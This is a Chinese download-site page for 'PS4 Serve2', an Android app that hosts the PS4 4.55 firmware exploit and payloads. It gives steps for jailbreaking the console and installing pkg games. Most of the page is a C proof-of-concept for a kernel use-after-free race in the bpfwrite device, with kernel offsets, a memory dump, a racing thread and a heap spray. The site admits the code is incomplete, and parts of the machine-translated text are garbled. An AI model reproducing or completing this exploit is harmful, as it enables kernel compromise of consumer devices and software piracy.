东坡下载:内容最丰富最安全的下载站!

帮助|文件类型库|最新更新|下载分类|排行榜

首页安卓游戏小程序 → ps4 serve2软件 1.2 安卓最新版
ps4 serve2软件1.2 安卓最新版

ps4 serve2软件

更新:2018-03-02 08:55

大小:1.8M

下载地址
更多安卓版 >
更多IOS版 >
更多PC版 >
二维码

扫描二维码安装到手机

好玩50%(10票)
坑爹50%(10票)

同一开发者

ps4 serve2软件截图ps4 serve2软件截图ps4 serve2软件截图ps4 serve2软件截图
  • 分类:小程序
  • 大小:1.8M
  • 语言:中文
  • 版本:1.2 安卓最新版
  • 时间:2018-03-02 08:55
  • 星级:
  • 官网:暂无
  • 厂商
  • 平台:Android

ps4 serve2 最新版是一款ps4漏洞服务器,可以使用此服务来对ps4 4.55进行定位和破解,避免漏洞的利用和有效载荷的注入等功能,懂破解的朋友欢迎下载尝试。

功能介绍

继我之前的发行版之后,我放置了一个Android应用程序来托管4.55漏洞和有效载荷。

您必须使用手机/平板电脑设置WiFi热点,并将PS4连接到该热点,或将手机/平板电脑连接到PS4所在的同一网络。

然后安装应用程序并打开它,在顶部将是您需要连接到PS4的地址。

您的设备可能会询问您是否安装了来自“未知来源”的应用程序,这可以允许,但这意味着它不是来自Google Play。

您只需选择要在应用中运行的有效载荷,然后使用PS4转到您在应用中看到的地址即可。

要更改有效载荷,只需在应用程序中选择它,然后使用ps4重新访问/重新刷新地址。

您可以将更多有效负载添加到应用程序中,只需将手机插入计算机,然后将您喜欢的任何有效负载BIN文件复制到PS4_455_Payloads目录中即可。

现在4.55漏洞和母鸡负载非常不稳定,您将不得不尝试一次又一次加载它,直到漏洞利用率和有效载荷正确注入。

你会得到很多 “没有足够的免费系统内存”的错误,只需选择好,并继续尝试

一旦你足够的战斗有效载荷将工作,你将能够安装和玩pkg游戏。

漏洞代码分享

/* bpfwrite race condition */

/* discovered by @qwertyoruiopz */

/* some bullshit from golden */

/*

https://gist.github.com/msantos/939154/eaeba01ba40cb137322ba1ea6d49a1b15580fdab

https://github.com/freebsd/freebsd/blob/master/sys/net/bpf.c

https://github.com/freebsd/freebsd/blob/master/sys/net/bpf_filter.c

*/

/*

4.05 offsets

bpf_cdevsw 0x186F640

bpf_drvinit 0x317140

bpfopen 0x3171B0

bpf_dtor 0x318D80

bpfwrite 0x3175D0

bpfread 0x317290

bpf_filter 0x224580

bpf_validate 0x224D60

devfs_set_cdevpriv 0x383F20

devfs_get_cdevpriv 0x383EE0

bpfioctl 0x317A40

- BIOCSETIF 0x8020426C (calls bpf_setif)

- BIOCSETF 0x80104267 (inlined)

- BIOCSETWF 0x8010427B (inlined)

1. call bpfioctl with BIOCSETWF and a valid program

2. write to the bpf device.

3. call bpfioctl with BIOCSETWF and a valid program. This will free the old program while it is executing.

4. allocate heap data with instructions to read/write in stack memory

5. ????

6. profit

once we can manipulate the data in the program, we can write an invalid program that bpf_validate would otherwise throw away.

case BPF_ST:

mem[pc->k] = A;

continue;

case BPF_LD|BPF_MEM:

A = mem[pc-t;k];

continue;

*/

/*

kernbase 0xFFFFFFFF8A63C000

bpf_cdevsw(0xFFFFFFFF8BEAB640):

09 20 12 17 00 00 00 80

50 62 DC 8A FF FF FF FF

B0 31 95 8A FF FF FF FF

00 00 00 00 00 00 00 00

C0 11 83 8A FF FF FF FF

90 32 95 8A FF FF FF FF

D0 35 95 8A FF FF FF FF

40 3A 95 8A FF FF FF FF

30 4B 95 8A FF FF FF FF

50 30 83 8A FF FF FF FF

0x8000000017122009

0xFFFFFFFF8ADC6250 (offset: 0x78A250) "bpf"

0xFFFFFFFF8A9531B0 (offset: 0x3171B0) bpfopen

0x0000000000000000 d_fdopen

0xFFFFFFFF8A8311C0 (offset: 0x1F51C0) d_close

0xFFFFFFFF8A953290 (offset: 0x317290) bpfread

0xFFFFFFFF8A9535D0 (offset: 0x3175D0) bpfwrite

0xFFFFFFFF8A953A40 (offset: 0x317A40) bpfioctl

0xFFFFFFFF8A954B30 (offset: 0x318B30) bpfpoll d_poll

0xFFFFFFFF8A833050 (offset: 0x1F7050) d_mmap

*/

#define BIOCSETWF 0x8010427B

__attribute__((aligned (1))) struct bpf_insn {

uint16_t code;

uint8_t jt;

uint8_t jf;

uint32_t k;

};

// needs to by 8 bytes

struct bpf_program {

int bf_len;

struct bpf_insn *bf_insns; // needs to be at offset 0x8

};

int bpf_device() {

int fd = -1;

char dev[32];

fd = open("/dev/bpf", O_RDWR, 00700);

if (fd > -1) {

return fd;

}

for(int i = 0; i < 255; i++) {

snprintf(dev, sizeof(dev), "/dev/bpf%u", i);

fd = open(dev, O_RDWR, 00700);

if (fd > -1) {

return fd;

}

}

return -1;

}

int bpfgo = 0;

int bpfend = 0;

void *bpfwrite_thread(void *vfd) {

// write and activate bpfwrite -> bpf_filter

int fd =(int)vfd;

while(!bpfend) {

// wait until we should go

while(!bpfgo && !bpfend) ;

char pack[32];

memset(pack, 0x41414141, 32);

write(fd, pack, 32);

bpfgo = 0;

}

return 0;

}

void bpfpoc() {

int fd = bpf_device();

// setup a valid program

// this is unique since it has a specific size that will allocated in a specific zone

// (making it easier to allocate an object overlapping this one, also gives more time for bpf_filter to execute)

// I used bpfc to compile a simple program

struct bpf_program fp;

struct bpf_insn insns[] = {

// there are 31 instructions here (31 * sizeof(struct bpf_insn)) = 248

// size of kernel malloc would be

{ 0x0, 0, 0, 0x00000539 }, // ld #1337

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x0, 0, 0, 0x00000539 },

{ 0x6, 0, 0, 0x00000000 }, // ret #0

};

fp.bf_len = sizeof(insns) / sizeof(struct bpf_insn);

fp.bf_insns = &insns[0];

// set this program

ioctl(fd, BIOCSETWF, &fp);

// create thread that we can command to write to the bpf device

ScePthread thread;

scePthreadCreate(&thread, NULL, bpfwrite_thread, (void *)fd, "bpfpoc");

// this poc gets turned into a much harder one since bpf code always halts in finite time, so we must race the bpf_filter function

// hopefully we can race the bpfwrite function after we free the program, so it will use after free

// we need to allocate a heap object that overlaps the memory that use to be at (struct bpf_insn)

// (allocated by bpfioctl and freed by our second call to bpfioctl, but the pointer is still being used by bpf_filter)

// create a malicious filter program and alter the overlapping heap object with this data

// read/write stack values, and do turing complete programming in kernel mode

// this probably will not work, and will not race correctly, you may need to multi thread

// TODO: timing corrections

while(1) {

bpfgo = 1;

// free the old program

ioctl(fd, BIOCSETWF, &fp);

// spray the heap

// size = ((unsigned int)ioctl_num >> 16) & 0x1FFF;

char object[248];

memset(object, 0x41414141, 248);

for(int i = 0; i < 512; i++) {

ioctl(0xFFFFFFFF, 0x80F80000, object);

}

// now we may or may not have overlapped said bpf_insn allocation that bpf_filter is using

// need a way to check if we are good

break;

}

// end thread and clean up

bpfend = 1;

scePthreadJoin(thread, NULL);

close(fd);

}

只说了下攻击原理,并未完整实现漏洞

相关新闻

目前4.05和4.55均可破解

4.05系统被黑客破解之后,让那些高于4.05系统玩家羡慕不已,随着玩家的呼声,黑客在近日又放出4.55系统的破解,让PS玩家大呼过瘾。

28日黑客公布的破解内容

通过黑客给出的漏洞,4.55系统版本的玩家们都开始测试破解,安装pkg游戏文件。

应用信息

  • 包名:stooged.ps4serve2
  • 名称:PS4 Serve2
  • 版本:1.2
  • 版本号:12
  • MD5:6bba190dd716807995431e0500afa9cb

网友评论

热门评论
最新评论
昵称:
表情: 高兴 可 汗 我不要 害羞 好 下下下 送花 屎 亲亲
字数: 0/500 (您的评论需要经过审核才能显示)

推荐软件

下载排行